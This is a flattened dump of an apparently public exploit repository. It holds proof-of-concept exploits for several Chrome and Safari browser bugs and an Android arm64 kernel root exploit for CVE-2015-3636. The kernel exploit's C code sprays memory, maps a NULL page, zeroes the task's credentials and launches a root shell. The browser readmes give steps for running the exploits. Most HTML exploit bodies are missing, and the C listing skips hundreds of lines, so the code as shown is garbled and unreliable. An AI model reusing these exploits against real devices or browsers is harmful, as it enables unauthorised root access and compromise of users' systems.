Proof of Concept Exploit for CVE-2016-4622

├── Linux └── CVE-2015-3636 │ ├── jni │ ├── Application.mk │ ├── Android.mk │ └── exp.c │ └── intro.md ├── Chrome ├── CVE-2015-6764 │ ├── readme.md │ └── Exploit_V2.html ├── CVE-2016-1646 │ ├── readme.md │ └── exploit.html ├── CVE-2015-1233 │ └── exploit.html ├── CVE-2014-3176 │ └── exploit.html └── CVE-2014-1736 │ └── exploit.html └── Safari └── CVE-2016-4622 └── exploit.html /Linux/CVE-2015-3636/jni/Application.mk: -------------------------------------------------------------------------------- 1 | APP_ABI := arm64-v8a 2 | -------------------------------------------------------------------------------- /Linux/CVE-2015-3636/intro.md: -------------------------------------------------------------------------------- 1 | CVE-2015-3636 Android arm64 kernel exploit for ["52pojie CTF 2016"](http://www.52pojie.cn/thread-480759-1-1.html) 2 | -------------------------------------------------------------------------------- /Linux/CVE-2015-3636/jni/Android.mk: -------------------------------------------------------------------------------- 1 | LOCAL_PATH := $(call my-dir) 2 | 3 | include $(CLEAR_VARS) 4 | 5 | LOCAL_MODULE:= exp 6 | 7 | LOCAL_SRC_FILES := exp.c 8 | 9 | include $(BUILD_EXECUTABLE) 10 | -------------------------------------------------------------------------------- /Chrome/CVE-2015-6764/readme.md: -------------------------------------------------------------------------------- 1 | [@oldfresher](https://twitter.com/oldfresher)'s exploit for his V8 bug [CVE-2015-6764](https://bugs.chromium.org/p/chromium/issues/detail?id=554946) is really awesome.I added some comments for his code and tried to use Uint32Array instead of DoubleArray to construct fake ArrayBuffer object that will be abused for arbitary memory R/W. 2 | You can get his exploit [here](https://github.com/secmob/cansecwest2016/blob/master/exploit.html). -------------------------------------------------------------------------------- /Chrome/CVE-2016-1646/readme.md: -------------------------------------------------------------------------------- 1 | With the exploit tricks I learnt from [oldfresher](http://twitter.com/oldfresher) I tried to complete a proof-of-concept exploit for [CVE-2016-1646](http://googlechromereleases.blogspot.com/2016/03/stable-channel-update_24.html), it has been tested on Win10 with Chrome 46.0.2490.0 installed. You can try it your self like the following steps: 2 | + Step1: start chrome with "--no-sandbox" 3 | + Step2: browse the page exploit.html 4 | 5 | 6 | -------------------------------------------------------------------------------- /Safari/CVE-2016-4622/exploit.html: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | Proof of Concept Exploit for CVE-2016-4622 8 | 13 | 14 |

15 |

16 | 212 | 213 | 214 | -------------------------------------------------------------------------------- /Chrome/CVE-2015-1233/exploit.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | CVE-2015-1233 4 | 5 | 6 | 7 | 8 | 14 | 15 |

16 | 244 | 245 | -------------------------------------------------------------------------------- /Chrome/CVE-2014-3176/exploit.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | CVE-2014-3176 4 | 5 | 6 | 7 | 8 | 14 | 15 |

16 | 282 | 283 | 284 | -------------------------------------------------------------------------------- /Chrome/CVE-2014-1736/exploit.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Proof of Concept Exploit for CVE-2014-1736 4 | 5 | 6 | 7 | 8 | 14 | 15 |

16 | 327 | 328 | -------------------------------------------------------------------------------- /Linux/CVE-2015-3636/jni/exp.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | 21 | #define PAGE_SIZE 4096 22 | #define SIOCGSTAMPNS 0x8907 23 | #define MAGIC_VALUE 0x4B5F5F4B 24 | #define OOM_DISABLE (-100) 25 | #define NSEC_PER_SEC 1000000000 26 | 27 | #define STATUS_SUCCESS 0 28 | #define STATUS_FAILURE -1 29 | #define MAX_PHYSMAP_SIZE 128*1024*1024 30 | #define MAX_PATH 0x100 31 | #define MAX_PHYSMAP_SPRAY_PROCESS 6 32 | #define MAX_VULTRIG_SOCKS_COUNT 4000 33 | #define MAX_NULLMAP_SIZE (PAGE_SIZE * 4) 34 | 35 | 36 | int vultrig_socks[MAX_VULTRIG_SOCKS_COUNT]; 37 | void* physmap_spray_pages[(MAX_PHYSMAP_SIZE / PAGE_SIZE) * MAX_PHYSMAP_SPRAY_PROCESS]; 38 | int physmap_spray_pages_count; 39 | 40 | 41 | static int 42 | maximize_fd_limit(void) 43 | { 44 | struct rlimit rlim; 45 | int ret; 46 | 47 | ret = getrlimit(RLIMIT_NOFILE, &rlim); 48 | if (ret != 0) { 49 | return -1; 50 | } 51 | 52 | rlim.rlim_cur = rlim.rlim_max; 53 | setrlimit(RLIMIT_NOFILE, &rlim); 54 | 55 | ret = getrlimit(RLIMIT_NOFILE, &rlim); 56 | if (ret != 0) { 57 | return -1; 58 | } 59 | 60 | return rlim.rlim_cur; 61 | } 62 | 63 | 64 | 65 | int spray_nofork(unsigned int size) 66 | { 67 | 68 | void* mapped; 69 | void* mapped_page; 70 | int ret, i; 71 | 72 | mapped = mmap(NULL, size , PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0); 73 | if(MAP_FAILED == mapped) 74 | { 75 | printf("[*] mmap fail.\n"); 76 | exit(-1); 77 | } 78 | 79 | 80 | for(i=0; i /proc/sys/vm/mmap_min_addr"); 317 | void* user_mm = mmap(PAGE_SIZE, MAX_NULLMAP_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE| MAP_FIXED |MAP_ANONYMOUS, -1, 0); 318 | if(MAP_FAILED == user_mm) 319 | { 320 | perror("[-] mmap NULL fail"); 321 | exit(-1); 322 | } 323 | 324 | for(i=0; icred to gain root privilege 460 | */ 461 | task = NULL; 462 | task = (void *)*(unsigned long *)((char *)user_mm + 0x18); 463 | printf("[*] task:%p\n", task); 464 | 465 | cred = NULL; 466 | kernel_read8((char *)task + 0x398, &cred); 467 | printf("[*] cred:%p\n", cred); 468 | 469 | data4 = 0; 470 | kernel_write4((char *)cred + 4, &data4); 471 | kernel_write4((char *)cred + 8, &data4); 472 | kernel_write4((char *)cred + 12, &data4); 473 | kernel_write4((char *)cred + 16, &data4); 474 | kernel_write4((char *)cred + 20, &data4); 475 | kernel_write4((char *)cred + 24, &data4); 476 | kernel_write4((char *)cred + 28, &data4); 477 | kernel_write4((char *)cred + 32, &data4); 478 | 479 | /* 480 | cleanup to avoid crash. overwirte task_struct->files->fdt->max_fds to 0 481 | */ 482 | 483 | kernel_read8((char *)task + 0x788, &files); 484 | printf("[*] files:%p\n", files); 485 | 486 | kernel_read8((char *)files + 8, &fdt); 487 | printf("[*] fdt:%p\n", fdt); 488 | 489 | data4 = 0; 490 | kernel_write4(fdt, &data4); 491 | 492 | 493 | if(getuid() == 0) 494 | { 495 | printf("[*] congrats, enjoy your root shell.\n"); 496 | system("/system/bin/sh"); 497 | } 498 | else 499 | { 500 | printf("[*] Oops, you'd better have a cup of tea and try again:(\n"); 501 | } 502 | 503 | 504 | 505 | return 0; 506 | } 507 | 508 | -------------------------------------------------------------------------------- /Chrome/CVE-2015-6764/Exploit_V2.html: -------------------------------------------------------------------------------- 1 | 8 | 9 | 10 | 11 | 12 | 13 |

14 | 461 | 462 | -------------------------------------------------------------------------------- /Chrome/CVE-2016-1646/exploit.html: -------------------------------------------------------------------------------- 1 | 75 | 76 | 77 | 78 | 79 | 80 |

81 | 579 | 580 | --------------------------------------------------------------------------------